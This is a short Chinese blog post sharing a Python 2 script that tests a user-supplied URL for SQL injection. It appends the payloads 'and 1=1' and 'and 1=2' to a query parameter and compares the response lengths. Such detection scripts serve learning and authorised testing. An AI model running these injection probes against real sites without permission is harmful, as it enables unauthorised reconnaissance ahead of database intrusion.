代码很简单,大牛飘过,仅供自己YY使用~主要还是urllib模块的使用

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import urllib

target = raw_input("Please enter your target(eg:www.baidu.com/asp?id=1):")
num1 = 0
num2 = 0
checkOne = urllib.urlopen("http://"+target+"+and+1=1")
while True:
    rs = checkOne.read(1024)
    if not rs:
        break
    else:
        num1 = num1 + len(rs)
checkTwo = urllib.urlopen("http://"+target+"+and+1=2")
while True:
    rs = checkTwo.read(1024)
    if not rs:
        break
    else:
        num2 = num2 + len(rs)
if num1 <> num2:
    print "Bingo!Sql injection exists!"
else:
    print "Sorry.you are bad luck!"

本文转sinojelly51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/401423，如需转载请自行联系原作者